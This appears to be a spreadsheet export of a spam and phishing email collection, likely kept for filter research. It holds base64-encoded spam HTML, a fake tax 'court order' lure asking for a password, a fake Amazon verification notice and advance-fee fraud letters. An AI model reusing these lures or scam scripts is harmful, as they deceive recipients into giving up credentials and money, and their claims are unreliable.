CAgICAgICAgICAgICAgIDxUQUJMRSBjZWxsU3BhY2luZz0wIGNlbGxQYWRk\naW5nPTAgd2lkdGg9IjEwMCUiIGJvcmRlcj0wPg0KICAgICAgICAgICAgICAg\nICAgICANCiAgICAgICAgICAgICAgICAgICAgPFRSPg0KICAgICAgICAgICAg\nICAgICAgICAgIDxURD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDxESVYg\nYWxpZ249bGVmdD48Rk9OVCANCiAgICAgICAgICAgICAgICAgICAgICAgIGZh\nY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIA0K\nICAgICAgICAgICAgICAgICAgICAgICAgc2l6ZT0yPjxCPjxGT05UIA0KICAg\nICAgICAgICAgICAgICAgICAgICAgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhl\nbHZldGljYSwgc2Fucy1zZXJpZiIgDQogICAgICAgICAgICAgICAgICAgICAg\nICBjb2xvcj0jMDAwMDAwIHNpemU9Mj48QlI+PC9GT05UPjwvQj48L0ZPTlQ+\nPEZPTlQgDQogICAgICAgICAgICAgICAgICAgICAgICBjb2xvcj0jMDAwMDAw\nPjxCPjxGT05UIA0KICAgICAgICAgICAgICAgICAgICAgICAgZmFjZT0iVmVy\nZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0yPkRl\nYXIgDQogICAgICAgICAgICAgICAgICAgICAgICBIb21lb3duZXIsPC9GT05U\nPjwvQj48L0ZPTlQ+PC9ESVY+DQogICAgICAgICAgICAgICAgICAgICAgICA8\nRElWIGFsaWduPWxlZnQ+Jm5ic3A7PC9ESVY+DQogICAgICAgICAgICAgICAg\nICAgICAgICA8RElWIGFsaWduPWNlbnRlcj48Qj48Rk9OVCANCiAgICAgICAg\nICAgICAgICAgICAgICAgIGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRp\nY2EsIHNhbnMtc2VyaWYiPio8L0ZPTlQ+PEZPTlQgDQogICAgICAgICAgICAg\nICAgICAgICAgICBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBz\nYW5zLXNlcmlmIiANCiAgICAgICAgICAgICAgICAgICAgICAgIGNvbG9yPSNm\nZjAwMDA+Ni4yNSUgMzAgWXIgRml4ZWQgUmF0ZSANCiAgICAgICAgICAgICAg\nICAgICAgICAgIE1vcnRnYWdlPC9GT05UPjwvQj48L0RJVj48L1REPjwvVFI+\nDQogICAgICAgICAgICAgICAgICAgIDxUUj4NCiAgICAgICAgICAgICAgICAg\nICAgICA8VEQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8RElWIGFsaWdu\nPWxlZnQ+PEZPTlQgDQogICAgICAgICAgICAgICAgICAgICAgICBmYWNlPVZl\ncmRhbmEsQXJpYWwsSGVsdmV0aWNhLHNhbnMtc2VyaWYgc2l6ZT0yPkludGVy\nZXN0IA0KICAgICAgICAgICAgICAgICAgICAgICAgcmF0ZXMgYXJlIGF0IHRo\nZWlyIGxvd2VzdCBwb2ludCBpbiA0MCB5ZWFycyEgV2UgaGVscCB5b3UgDQog\nICAgICAgICAgICAgICAgICAgICAgICBmaW5kIHRoZSBiZXN0IHJhdGUgZm9y\nIHlvdXIgc2l0dWF0aW9uIGJ5IG1hdGNoaW5nIHlvdXIgDQogICAgICAgICAg\nICAgICAgICAgICAgICBuZWVkcyB3aXRoIGh1bmRyZWRzIG9mIGxlbmRlcnMh\nIDxCPkhvbWUgSW1wcm92ZW1lbnQ8L0I+LCANCiAgICAgICAgICAgICAgICAg\nICAgICAgIDxCPlJlZmluYW5jZTwvQj4sIDxCPlNlY29uZCBNb3J0Z2FnZTwv\nQj4sIDxCPkhvbWUgRXF1aXR5IA0KICAgICAgICAgICAgICAgICAgICAgICAg\nTG9hbnMsIGFuZCBNb3JlISA8L0I+RXZlbiB3aXRoIGxlc3MgdGhhbiBwZXJm\nZWN0IGNyZWRpdCEgDQogICAgICAgICAgICAgICAgICAgICAgICA8L0ZPTlQ+\nPC9ESVY+PC9URD48L1RSPjwvVEFCTEU+DQogICAgICAgICAgICAgICAgICA8\nVEFCTEUgc3R5bGU9IlBPU0lUSU9OOiByZWxhdGl2ZTsgQk9SREVSLUNPTExB\nUFNFOiBjb2xsYXBzZSIgDQogICAgICAgICAgICAgICAgICBib3JkZXJDb2xv\ncj0jMTExMTExIGhlaWdodD0xIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9\nMCANCiAgICAgICAgICAgICAgICAgIHdpZHRoPTUwNCBib3JkZXI9MD4NCiAg\nICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgIDxUUj4N\nCiAgICAgICAgICAgICAgICAgICAgICA8VEQgdkFsaWduPXRvcCB3aWR0aD0z\nMjUgaGVpZ2h0PTE+DQogICAgICAgICAgICAgICAgICAgICAgICA8RElWIGFs\naWduPWNlbnRlcj48Rk9OVCANCiAgICAgICAgICAgICAgICAgICAgICAgIGZh\nY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIA0K\nICAgICAgICAgICAgICAgICAgICAgICAgc2l6ZT0yPjxCPjxCUj48L0E+PEEg\nDQogICAgICAgICAgICAgICAgICAgICAgICBocmVmPSJodHRwOi8vNjQuMjUx\nLjIyLjEwMS9pbnRlcmVzdC9pbmRleDUyNTQ0Lmh0bSI+Q2xpY2sgSGVyZSBm\nb3IgYSBGcmVlIA0KICAgICAgICAgICAgICAgICAgICAgICAgUXVvdGUhPC9B\nPjwvQj48L0ZPTlQ+PEEgDQogICAgICAgICAgICAgICAgICAgICAgIA0KICAg\nICAgICAgICAgICAgICAgICAgICAgaHJlZj0iaHR0cDovLzY0LjI1MS4yMi4x\nMDEvaW50ZXJlc3QvaW5kZXguaHRtIj4gPC9BPjwvRElWPg0KICAgICAgICAg\nICAgICAgICAgICAgICAgPFA+PEI+PEZPTlQgZmFjZT1WZXJkYW5hLEFyaWFs\nLEhlbHZldGljYSxzYW5zLXNlcmlmIA0KICAgICAgICAgICAgICAgICAgICAg\nICAgc2l6ZT0yPkxvY2sgSW4gWU9VUiBMT1cgRklYRUQgUkFURSBUT0RBWTwv\nRk9OVD48L0I+PC9QPg0KICAgICAgICAgICAgICAgICAgICAgICAgPERMPg0K\nICAgICAgICAgICAgICAgICAgICAgICAgICA8REQ+PEI+PEZPTlQgZmFjZT1X\nZWJkaW5ncyBjb2xvcj0jZmYwMDAwIHNpemU9NSANCiAgICAgICAgICAgICAg\nICAgICAgICAgICAgUFRTSVpFPSIxMCI+YTwvRk9OVD48Rk9OVCANCiAgICAg\nICAgICAgICAgICAgICAgICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhlbHZl\ndGljYSxzYW5zLXNlcmlmIHNpemU9Mj5OTyBDT1NUIA0KICAgICAgICAgICAg\nICAgICAgICAgICAgICBPVVQgT0YgUE9DS0VUPC9GT05UPjwvQj4gDQogICAg\nICAgICAgICAgICAgICAgICAgICAgIDxERD48Qj48Rk9OVCBmYWNlPVdlYmRp\nbmdzIGNvbG9yPSNmZjAwMDAgc2l6ZT01IA0KICAgICAgICAgICAgICAgICAg\nICAgICAgICBQVFNJWkU9IjEwIj5hPC9GT05UPjwvQj48Rk9OVCANCiAgICAg\nICAgICAgICAgICAgICAgICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhlbHZl\ndGljYSxzYW5zLXNlcmlmIHNpemU9Mj48Qj5OTyANCiAgICAgICAgICAgICAg\nICAgICAgICAgICAgT0JMSUdBVElPTjwvQj48L0ZPTlQ+IA0KICAgICAgICAg\nICAgICAgICAgICAgICAgICA8REQ+PEI+PEZPTlQgZmFjZT1XZWJkaW5ncyBj\nb2xvcj0jZmYwMDAwIHNpemU9NSANCiAgICAgICAgICAgICAgICAgICAgICAg\nICAgUFRTSVpFPSIxMCI+YTwvRk9OVD48L0I+PEZPTlQgDQogICAgICAgICAg\nICAgICAgICAgICAgICAgIGZhY2U9VmVyZGFuYSxBcmlhbCxIZWx2ZXRpY2Es\nc2Fucy1zZXJpZiBzaXplPTI+PEI+RlJFRSANCiAgICAgICAgICAgICAgICAg\nICAgICAgICAgQ09OU1VMVEFUSU9OPC9CPjwvRk9OVD4gDQogICAgICAgICAg\nICAgICAgICAgICAgICAgIDxERD48Qj48Rk9OVCBmYWNlPVdlYmRpbmdzIGNv\nbG9yPSNmZjAwMDAgc2l6ZT01IA0KICAgICAgICAgICAgICAgICAgICAgICAg\nICBQVFNJWkU9IjEwIj5hPC9GT05UPjwvQj48Rk9OVCANCiAgICAgICAgICAg\nICAgICAgICAgICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhlbHZldGljYSxz\nYW5zLXNlcmlmIHNpemU9Mj48Qj5BTEwgDQogICAgICAgICAgICAgICAgICAg\nICAgICAgIENSRURJVCBHUkFERVMgQUNDRVBURUQ8L0I+PC9GT05UPiA8L0RE\nPjwvREw+DQogICAgICAgICAgICAgICAgICAgICAgICA8RElWIGFsaWduPWNl\nbnRlcj48Rk9OVCANCiAgICAgICAgICAgICAgICAgICAgICAgIGZhY2U9VmVy\nZGFuYSxBcmlhbCxIZWx2ZXRpY2Esc2Fucy1zZXJpZiBjb2xvcj1yZWQgDQog\nICAgICAgICAgICAgICAgICAgICAgICBzaXplPTI+PEI+PEEgDQogICAgICAg\nICAgICAgICAgICAgICAgICBocmVmPSJodHRwOi8vNjQuMjUxLjIyLjEwMS9p\nbnRlcmVzdC9pbmRleDUyNTQ0Lmh0bSI+UmF0ZXMgYXMgDQogICAgICAgICAg\nICAgICAgICAgICAgICBsb3cgYXMgNi4yNSUgd29uJ3Qgc3RheSB0aGlzIGxv\ndyBmb3JldmVyIENMSUNLIA0KICAgICAgICAgICAgICAgICAgICAgICAgSEVS\nRTwvQT48L0I+PC9GT05UPjwvRElWPg0KICAgICAgICAgICAgICAgICAgICAg\nICAgPERJViBhbGlnbj1jZW50ZXI+Jm5ic3A7PC9ESVY+DQogICAgICAgICAg\nICAgICAgICAgICAgICA8RElWIGFsaWduPWNlbnRlcj48Rk9OVCBzaXplPTIg\nUFRTSVpFPSIxMCI+PEI+PEZPTlQgDQogICAgICAgICAgICAgICAgICAgICAg\nICBzdHlsZT0iRk9OVC1TSVpFOiA2cHQiIA0KICAgICAgICAgICAgICAgICAg\nICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhlbHZldGljYSxzYW5zLXNlcmlm\nPiogYmFzZWQgb24gDQogICAgICAgICAgICAgICAgICAgICAgICBtb3J0Z2Fn\nZSByYXRlIGFzIG9mIDUtMTUtMDIgYXMgbG93IGFzIDYuMjUlIHNlZSBsZW5k\nZXIgDQogICAgICAgICAgICAgICAgICAgICAgICBmb3IgZGV0YWlsczwvRk9O\nVD48L0I+PC9GT05UPjwvRElWPjwvVEQ+DQogICAgICAgICAgICAgICAgICAg\nICAgPFREIHZBbGlnbj10b3Agd2lkdGg9NCBoZWlnaHQ9MT4NCiAgICAgICAg\nICAgICAgICAgICAgICAgIDxESVYgYWxpZ249cmlnaHQ+Jm5ic3A7PC9ESVY+\nPC9URD4NCiAgICAgICAgICAgICAgICAgICAgICA8VEQgYm9yZGVyQ29sb3I9\nIzAwNjYwMCB3aWR0aD0xNzUgYmdDb2xvcj0jZmZmZmZmIA0KaGVpZ2h0PTE+\nDQogICAgICAgICAgICAgICAgICAgICAgICA8SDE+PFNQQU4gc3R5bGU9IlZF\nUlRJQ0FMLUFMSUdOOiBtaWRkbGUiPjxGT05UIA0KICAgICAgICAgICAgICAg\nICAgICAgICAgc3R5bGU9IkZPTlQtU0laRTogMjAwcHgiIGZhY2U9V2ViZGlu\nZ3MgY29sb3I9IzAwNjYwMD48QSANCiAgICAgICAgICAgICAgICAgICAgICAg\nIGhyZWY9Imh0dHA6Ly82NC4yNTEuMjIuMTAxL2ludGVyZXN0L2luZGV4NTI1\nNDQuaHRtIj48Rk9OVCANCiAgICAgICAgICAgICAgICAgICAgICAgIGNvbG9y\nPSMwMDY2MDA+SDwvRk9OVD48L0E+PC9GT05UPjwvU1BBTj48L0gxPjwvVEQ+\nPC9UUj48L1RBQkxFPg0KICAgICAgICAgICAgICAgICAgPFRBQkxFIGNlbGxT\ncGFjaW5nPTAgY2VsbFBhZGRpbmc9MyB3aWR0aD00NzIgYm9yZGVyPTA+DQog\nICAgICAgICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAgICAg\nICAgPFRSPg0KICAgICAgICAgICAgICAgICAgICAgIDxURCBjb2xTcGFuPTIg\naGVpZ2h0PTY0PjxGT05UIA0KICAgICAgICAgICAgICAgICAgICAgICAgZmFj\nZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6\nZT0yPjxCPg0KICAgICAgICAgICAgICAgICAgICAgICAgPFRBQkxFIGhlaWdo\ndD0zOCBjZWxsU3BhY2luZz0yIGNlbGxQYWRkaW5nPTAgd2lkdGg9NDgyIA0K\nICAgICAgICAgICAgICAgICAgICAgICAgYm9yZGVyPTA+DQogICAgICAgICAg\nICAgICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAgICAgICAg\nICAgICAgPFRSPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURCAN\nCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBzdHlsZT0iQk9SREVSLVJJ\nR0hUOiAwcHggc29saWQ7IEJPUkRFUi1UT1A6IDBweCBzb2xpZDsgQk9SREVS\nLUxFRlQ6IDBweCBzb2xpZDsgQk9SREVSLUJPVFRPTTogMHB4IHNvbGlkIiAN\nCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aWR0aD0zMjcgaGVpZ2h0\nPTM2PjxGT05UIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmFj\nZT1WZXJkYW5hLEFyaWFsLEhlbHZldGljYSxzYW5zLXNlcmlmIA0KICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgc2l6ZT0yPkFwcGx5IG5vdyBhbmQg\nb25lIG9mIG91ciBsZW5kaW5nIHBhcnRuZXJzIA0KICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgd2lsbCBnZXQgYmFjayB0byB5b3Ugd2l0aGluIDQ4\nIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG91cnMuPC9GT05U\nPjwvRk9OVD48Rk9OVCBzdHlsZT0iRk9OVC1TSVpFOiA2cHQiIA0KICAgICAg\nICAgICAgICAgICAgICAgICAgICAgICAgZmFjZT1WZXJkYW5hLEFyaWFsLEhl\nbHZldGljYSxzYW5zLXNlcmlmPjwvRk9OVD48L1REPjwvRk9OVD48Rk9OVCAN\nCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBmYWNlPSJWZXJkYW5hLCBB\ncmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPTI+DQogICAgICAg\nICAgICAgICAgICAgICAgICAgICAgPFREIHN0eWxlPSJCT1JERVItTEVGVDog\nMXB4IHNvbGlkIiB3aWR0aD0xNDEgDQogICAgICAgICAgICAgICAgICAgICAg\nICAgICAgYmdDb2xvcj0jZmYwMDAwIGhlaWdodD0zNj4NCiAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgIDxQIGFsaWduPWNlbnRlcj48Qj48Rk9OVCBj\nb2xvcj0jZmZmZmZmIHNpemU9ND48QSANCiAgICAgICAgICAgICAgICAgICAg\nICAgICAgICAgIHN0eWxlPSJURVhULURFQ09SQVRJT046IG5vbmUiIA0KICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgaHJlZj0iaHR0cDovLzY0LjI1\nMS4yMi4xMDEvaW50ZXJlc3QvaW5kZXg1MjU0NC5odG0iPjxGT05UIA0KICAg\nICAgICAgICAgICAgICAgICAgICAgICAgICAgY29sb3I9I2ZmZmZmZj5DTElD\nSyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBIRVJFITwvRk9OVD48\nL0E+PC9GT05UPjwvQj48L1A+PC9URD4NCiAgICAgICAgICAgICAgPC9UUj4N\nCiAgICAgICAgICAgIDwvVEFCTEU+PC9GT05UPjwvQj48L1REPjwvVFI+PC9U\nQk9EWT48L1RBQkxFPjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9URD48\nL1RSPjwvVEJPRFk+PC9UQUJMRT4NCiAgICAgIDxQPmNvbXBsZXRlIG5hbWUg\ncmVtb3Zpbmcgc3lzdGVtIGF0IHdlYnNpdGUuDQo8cD4NCjwvaHRtbD4NCg0K\nNTQ5NWdvU1g5LTgzMXJHanI0MDkxWW1yRzItOTU2bnF4TjE5MTFCUHFSNi04\nMTNGcXlYNDgxM1FBQU8xLTYxNlZHcGUyNzZsNjc=\n\n------=_NextPart_000_00D6_44B11E8C.E6018B42--\n\n--DeathToSpamDeathToSpamDeathToSpam--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-Sightings mailing list\nSpamassassin-Sightings@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>5508</t>
  </si>
  <si>
    <t>To: &lt;cpunks@minder.net&gt;\nFrom: &lt;bob0683r11@nitronet.net&gt;\nDate: Thu, 25 Jul 0102 20:06:53 +0100</t>
  </si>
  <si>
    <t>Thu, 25 Jul 0102 20:06:53 +0100</t>
  </si>
  <si>
    <t>&lt;bob0683r11@nitronet.net&gt;</t>
  </si>
  <si>
    <t>Married but lonely ?                                                                    7012AzYa1-040jxGt0341bxgg-24</t>
  </si>
  <si>
    <t>------=_NextPart_000_00A8_33A71B3A.A8744E52\nContent-Type: text/plain; charset="iso-8859-1"\nContent-Transfer-Encoding: base64\n\n\nNzQ5NmZjUUEyLTlsMTAgDQoNCkZvciB0aGUgbWVuOiAgDQoqQ3VycmVudGx5\nLCB0aGVyZSBhcmUgMTQyLDczNiBtYXJyaWVkIHdvbWVuIGluIHRoZSBVLlMu\nIA0Kd2hvIGFyZSBsb25sZXkgYW5kIGxvb2tpbmcgZm9yIHNvbWUgZnVuLiAg\nDQoNCkZvciB0aGUgd29tZW46DQoqQ3VycmVudGx5LCB0aGVyZSBhcmUgMTI2\nLDA4NSBtYXJyaWVkIG1lbiBpbiB0aGUgVS5TLiANCndobyBhcmUgbG9ubGV5\nIGFuZCBsb29raW5nIGZvciBzb21lIGZ1bi4NCg0KKmNoYXQgb25saW5lIHdp\ndGggdGhvdXNhbmRzIG9mIG90aGVycyAyNC83DQoNCipXZSd2ZSBwYWlyZWQg\ndXAgdGVucyBvZiB0aG91c2FuZHMgb2YgbG9uZWx5IG1hcnJpZWQgbWVuIGFu\nZCB3b21lbiBpbiBsZXNzIHRoYW4gMiB5ZWFycywgd2l0aCBvdmVyIDI3IG1p\nbGxpb24gdmlzaXRvcnMgdG8gdGhlIHNpdGUuLi55b3UgZG9uJ3Qgd2FudCB0\nbyBtaXNzIG91dCBvbiB0aGlzLiAgQnV0IGJlZm9yZSB5b3UgZW50ZXIgdGhl\nIHNpdGUsIHdlIGFzayB0aGF0IHlvdSBQTEVBU0UgUkVTUEVDVCBldmVyeW9u\nZSdzIGZlZWxpbmdzLiAgWW91IG1heSByZWNlaXZlIG1lc3NhZ2VzIGZyb20g\naW5kaXZpZHVhbHMgb2Ygd2hpY2ggeW91IG1heSBub3QgYmUgaW50ZXJlc3Rl\nZCBpbiwgcmVnYXJkbGVzcywgcGxlYXNlIGJlIGNvbnNpZGVyYXRlLg0KQ29t\nZSBjaGVjayBpdCBvdXQ6ICANCg0KaHR0cDovL3d3dy5hZHVsdGRhdGluZ3Nl\ncnZpY2UubmV0L3dlYm1hcnJpZWRhbmRsb29raW5nLyAgDQoNCg0KDQoNCg0K\nDQoNCg0KDQoNCg0KNjY4N3hBbFU2LTc2N0JzSk4zNjU0bGFRczctNTk3emF0\nVzUzNzlYQ2xrOC02bDQy\n------=_NextPart_000_00A8_33A71B3A.A8744E52--\n\n--DeathToSpamDeathToSpamDeathToSpam--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-Sightings mailing list\nSpamassassin-Sightings@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>5487</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efi.ie&gt;\nFrom: &lt;investors9829032400m22@excite.com&gt;\nDate: Thu, 25 Jul 0102 17:19:50 +0800</t>
  </si>
  <si>
    <t>Thu, 25 Jul 0102 17:19:50 +0800</t>
  </si>
  <si>
    <t>&lt;investors9829032400m22@excite.com&gt;</t>
  </si>
  <si>
    <t>FREE ONLINE TRADER TRAINING!</t>
  </si>
  <si>
    <t>Learn from the BEST...for FREE! \n\nLearn to locate the markets that will make you money. \nYou'll learn how to find and track both stocks and \ncommodities with our FREE software. There's more... \n\nWe'll also give you 90 days' worth of FREE expert \ntraining in the use of our software. \n\nOnce you're comfortable, your first five trades are \nalso free - NO FEES! We have the system that has \nreturned profits, and you can have your own personal\nconsultant - FREE customer service for a full 90 days \nto help you learn how to work from home with our free \nsoftware. \n\nSimply click below for more details and to request \nyour free software: \n\n[URL]http://www.page4life.org[/URL]\n\n\nTo be removed from any future mailings, please visit\nthis page:\n\n[URL]http://www.page4life.org[/URL]\n\n7593AVEx4-349vjkA2882cneQ0-78l27</t>
  </si>
  <si>
    <t>http://www.page4life.org http://www.page4life.org</t>
  </si>
  <si>
    <t>1023</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Mark Rowsell" &lt;JAYEM@MEGA.BW&gt;\nDate: Thu, 25 Apr 2019 06:34:37 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Apr 2019 06:34:37 -0700</t>
  </si>
  <si>
    <t>"Mark Rowsell" &lt;JAYEM@MEGA.BW&gt;</t>
  </si>
  <si>
    <t>Court order on pending invoice</t>
  </si>
  <si>
    <t>This-email--s-from-a-trusted-s-urce. 	               Hello Taxpayer,  You have received an invoice   COURT ORDER IN2748  4/25/2019  Click below to enter your password and download secured adobe invoice file online:     TAX-INVOICE/d18=796    FEDERAL TAX AUTHORITY  [URL]www.tax.gov.ae[/URL]      Disclaimer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mess-ges was sent from the Attorney's Office.   CASE ID : ##497UK019     This email ιs from a trusted sοurce.       Hello Taxpayer, You have received an invoice COURT ORDER IN2748  4/25/2019 Click below to enter your password and download secured adobe invoice file online:   TAX-INVOICE/d18=796  FEDERAL TAX AUTHORITY [URL]www.tax.gov.ae[/URL]   Disclaimer The information contained in this communication from the sender is confidential. It is intended solely for use by the recipient and others authorized to receive it. If you are not the recipient, you are hereby notified that any disclosure, copying, distribution or taking action in relation of the contents of this information is strictly prohibited and may be unlawful. This messαges was sent from the Attorney's Office. CASE ID : ##497UK019</t>
  </si>
  <si>
    <t>www.tax.gov.ae www.tax.gov.ae</t>
  </si>
  <si>
    <t>ARE</t>
  </si>
  <si>
    <t>3096</t>
  </si>
  <si>
    <t>To: olssonk@UM\nFrom: MRS. LARISA SOSNITSKAYA &lt;larisasosnkayagoahg@mail2russia.com&gt;\nDate: Thu, 24 May 2007 08:12:21 -1100</t>
  </si>
  <si>
    <t>Thu, 24 May 2007 08:12:21 -1100</t>
  </si>
  <si>
    <t>MRS. LARISA SOSNITSKAYA &lt;larisasosnkayagoahg@mail2russia.com&gt;</t>
  </si>
  <si>
    <t>olssonk@UM</t>
  </si>
  <si>
    <t>A BUSINESS PROPOSAL FROM MRS. SOSNITSKAYA</t>
  </si>
  <si>
    <t>\n\nDear Friend,\n\nI am Mrs. Larisa Sosnitskaya and I represent Mr. Mikhail Khordokovsky\nformer C.E.O of Yukos Oil Company in Russia. I have a very sensitive and\n\nconfidential brief from this top (oligarch) to ask for your partnership\n\nin re-profiling funds US$46 Million. I will give the details, but in\nsummary, the funds are coming via Bank in europe . This is a legitimate\n\ntransaction. You will be paid 20% as your \n\ncommison/compensation for your active efforts and contribution to the \nsuccess of this transaction\n\nIf you are interested, please write back through mail:\nlarisasnkaya@yahoo.ie\nPlease, a detailed and confidential Telephone number, Fax number and\nEmail address will be needed and I will provide further details and\ninstructions\nregarding the transaction.\nPlease keep this confidential, we can't afford more political problems.\n\nYou can read more of the story on This website below\n\nabout my boss.\n\n\n[URL]http://www.mbktrial.com[/URL]\n\n\n[URL]http://news.bbc.co.uk[/URL]\n\nPlease, advice me on your position by email immediately via:\nlarisasnkaya@yahoo.ie\n\ni look forward to seeing your mail.\n\nYour Sincerely,\n\nMrs. Larisa Sosnitskaya\n\n\n\n\n</t>
  </si>
  <si>
    <t>662</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: Service &lt;service@eamazon.com&gt;\nDate: Thu, 24 Aug 2017 19:13:35 +0000</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2017 19:13:35 +0000</t>
  </si>
  <si>
    <t>Service &lt;service@eamazon.com&gt;</t>
  </si>
  <si>
    <t>Amazon Case-1020-3090-4080-1090</t>
  </si>
  <si>
    <t>Amazon Dear Customer, We need your help resolving an issue with your account. We have temporarily Iimited what you can do with your account intil the issue is resolved. What is the problem?... We need a little bit more information about you to help confirm your identity. Please update your information within 24 hours. CASE ID#-003-498-237-832. Click on the link below to update your information. [URL]http://www.amazon.com[/URL] Amazon Dear Customer, We need your help resolving an issue with your account. We have temporarily Iimited what you can do with your account intil the issue is resolved. What is the problem?... We need a little bit more information about you to help confirm your identity. Please update your information within 24 hours. CASE ID#-003-498-237-832. Click on the link below to update your information. [URL]http://www.amazon.com[/URL] Paul SmithManager Amazon Copyright Â© 1999-2017 Inc. Tel: 800-722-5909 Fax: 800-722-5909     place here your privacy disclaimer and unsubscribe link...</t>
  </si>
  <si>
    <t>http://www.amazon.com http://www.amazon.com</t>
  </si>
  <si>
    <t>2438</t>
  </si>
  <si>
    <t>To: nan\nFrom: mrs_awa005 mrs_awa005 &lt;mrs_awa005@hotmail.com&gt;\nDate: Thu, 24 Aug 2006 12:03:40 +0000</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2006 12:03:40 +0000</t>
  </si>
  <si>
    <t>mrs_awa005 mrs_awa005 &lt;mrs_awa005@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">TREAT AS URGENT5 </t>
  </si>
  <si>
    <t>FROM MRS AWA ABU\nATTN:  PROSPECTIVE PARTNER,\n\n                 A CONFIDENTIAL PROPOSAL\nGOOD DAY AND COMPLIMENT OF THE SEASON.I DEEM IT VITAL TO CONTACT YOU FOR A \nBUSINESS PROPOSAL BASED ON MY POSITION AS THE ACCOUNTANT GENERAL OF THE BANK \nOF AFRICA OUAGADOUGOU, BURKINA FASO .DURING MY QUATTERLY AUDITING/ACCOUNTING \n,I DISCOVERED IN A DOMICILIARY ACCOUNT FAVOURING A FOREIGN CUSTOMER , THE \nFLOATING SUM OF US$15,000,000 (FIFTEEN MILLION US DOLLARS).\nDURING MY INVESTIGATIONS ON THE ABANDONED SUM, I DISCOVERED THE OWNER AS A \nGERMAN CITIZEN NAMED MR.ANDREAS SCHRANNER WHO DIED IN A PLANE CRASH WITH HIS \nENTIRE FAMILY AND SUBSEQUENTLY THERE IS NO  NEXT OF KIN TO HIS ACCOUNT \n.VISIT THE WEB-SITE AS POSTED DATED .\nHTTP://NEWS.BBC.CO.UK/1/HI/WORLD/EUROPE/859479.STM\n\nBASED ON  THESE FACTUAL STATEMENTS, PLUS THE AVAILABLE FACTS AND FIGURES IN \nTHE BANK ARCHIVE ,WE STAND ON  A VANTAGE POINT  TO PUTTING UP A CLAIM ON THE \nFUND. THIS PROVIDENTIAL MISSION IS  HINGED ON THE FACT THAT, IT IS ONLY A \nFOREIGNER THAT CAN SUCCESSFULLY CLAIM THIS FUND SINCE THE  LATE DEPOSITOR \nWAS A FOREIGNER HIMSELF.\nWHAT YOU ARE REQUIRED TO DO IMPLICITLY IS TO PUT UP AN APPLICATION TO THE \nBANK AS HIS NOMINATED NEXT OF KIN BY HIS EXTENDED FAMILY IN GERMANY WHICH IS \nA WORKABLE APPROACH BECAUSE YOU WILL STAND BY THE POWER OF SUCH NOMINATION \nAS HIS COUSIN RESIDENT IN WHERE YOU ARE TODAY TO CLAIM THIS FUND INTO YOUR \nACCOUNT FOR BOTH OF US.\nANY QUESTION, INFORMATION THAT MAY BE REQUIRED BY THE BANK DURING THE \nPROCESS OF THE RECLAMATION WILL BE FORWARDED TO YOU ON DEMAND AS TO ENSURE \nTHAT THIS VENTURE IS SUCCESSFUL. IT IS HIGHLY CONFIDENTIAL AND RISK FREE BY \nVIRTUE OF MY POSITION AS AN INSIDER IN THE BANK.\nFINALLY, I SHALL GIVE YOU 30% IN RESPECT OF YOUR ASSISTANCE TO GET \nTRANSFERRED THIS FUND  INTO YOUR ACCOUNT OVERSEA.I WILL RELEASE TO YOU A \nDETAILED INFORMATION COVERING THE ABANDONED FUND ON YOUR URGENT REPLY. \nPLEASE I WANT YOU TO REPLY ME\nBACK WITH THIS EMAIL ADDRESS( mrs_awa2006@yahoo.com)\n\nMRS AWA ABU\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2731</t>
  </si>
  <si>
    <t>To: nan\nFrom: woma lee &lt;woma_lee_3@hotmail.com&gt;\nDate: Thu, 23 Nov 2006 15:16:24 +0000</t>
  </si>
  <si>
